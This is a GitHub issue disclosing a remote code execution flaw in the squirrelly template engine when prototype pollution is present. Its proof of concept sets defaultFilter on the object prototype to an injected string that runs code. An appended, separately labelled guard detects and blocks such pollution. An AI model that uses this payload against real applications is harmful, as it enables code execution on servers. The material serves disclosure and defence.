Open sayoojbkumar opened 2 years ago
RCE when combined with Prototype Pollution
squirrelly-js is vulnerable to RCE when Prototype Pollution exists. An attacker can have control over `defaultFilter`, which leads to RCE.
To Reproduce
test.js

```javascript
const express = require('express')
var sqrl = require('squirrelly')
const app = express()
const port = 8000
constructor.prototype.defaultFilter = "e')); console.log('RCE') //"; // prototype pollution
app.set('views', __dirname);
app.set('view engine', 'squirrelly')
app.get('/', (req, res) => {
  res.render('index.squirrelly', { 'testValue': 'test' })
})
app.listen(port, () => {})
module.exports = app;
```
index.squirrelly

```html
<html>
  <head>
    <title>RCE via pp</title>
  </head>
  <body>
    <p>{{it.testValue}}</p>
  </body>
</html>
```
Screenshots
![Screenshot from 2021-08-15 16-48-46](https://user-images.githubusercontent.com/57182519/129476689-cdba47c2-3971-45af-8bce-94d556741e73.png)
Package & Environment Details
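A defensive guard for the class of bug reported above, added here as an example (it is not part of the issue or of squirrelly's own code): it detects whether config keys a template engine reads have already been planted on `Object.prototype`, and pins them so that later writes of the form `constructor.prototype.defaultFilter = ...` are dropped before any rendering happens. The key list (`defaultFilter` from the issue plus two further names), the function names and the placement at application startup are assumptions.

```javascript
'use strict';
// Constructed list of template-engine config keys to protect. "defaultFilter"
// is the key named in the issue; the other two are names assumed for illustration.
const SENSITIVE_KEYS = ['defaultFilter', 'autoEscape', 'varName'];

// Detection: a key is polluted when Object.prototype carries it as an own
// *data* property (the guard below installs an accessor, so it is not reported).
function findPollutedKeys(keys = SENSITIVE_KEYS) {
  return keys.filter((k) => {
    const d = Object.getOwnPropertyDescriptor(Object.prototype, k);
    return d !== undefined && 'value' in d;
  });
}
// Mitigation: pin one key on Object.prototype with a non-configurable accessor.
// Reads through the prototype yield undefined, writes to ordinary objects still
// create a normal own property, and writes aimed at Object.prototype itself
// (the issue's `constructor.prototype.defaultFilter = ...`) are dropped.
// Caveat: afterwards `key in {}` is true, so code that tests config keys with
// `in` will see them as present; hasOwnProperty checks are unaffected.
function pinKey(key) {
  Object.defineProperty(Object.prototype, key, {
    configurable: false,
    enumerable: false,
    get() { return undefined; },
    set(value) {
      // Drop writes to the prototype itself or to primitive receivers.
      if (this === Object.prototype || Object(this) !== this) return;
      Object.defineProperty(this, key, {
        value, writable: true, enumerable: true, configurable: true,
      });
    },
  });
}

// Startup guard: refuse to start if a key is already polluted, otherwise pin
// every sensitive key. Returns the number of keys pinned.
function guardTemplateConfig(keys = SENSITIVE_KEYS) {
  const polluted = findPollutedKeys(keys);
  if (polluted.length > 0) {
    throw new Error('Object.prototype already polluted: ' + polluted.join(', '));
  }
  keys.forEach(pinKey);
  return keys.length;
}

// Self-check after guarding: try the issue's style of write, then report
// whether a fresh object still sees the key as undefined.
function pollutionBlocked(key, value) {
  try { ({}).constructor.prototype[key] = value; } catch (e) { /* pinned */ }
  return ({})[key] === undefined;
}
```

Call `guardTemplateConfig()` once, before `app.set('view engine', ...)`, and after any library that legitimately extends `Object.prototype` has loaded.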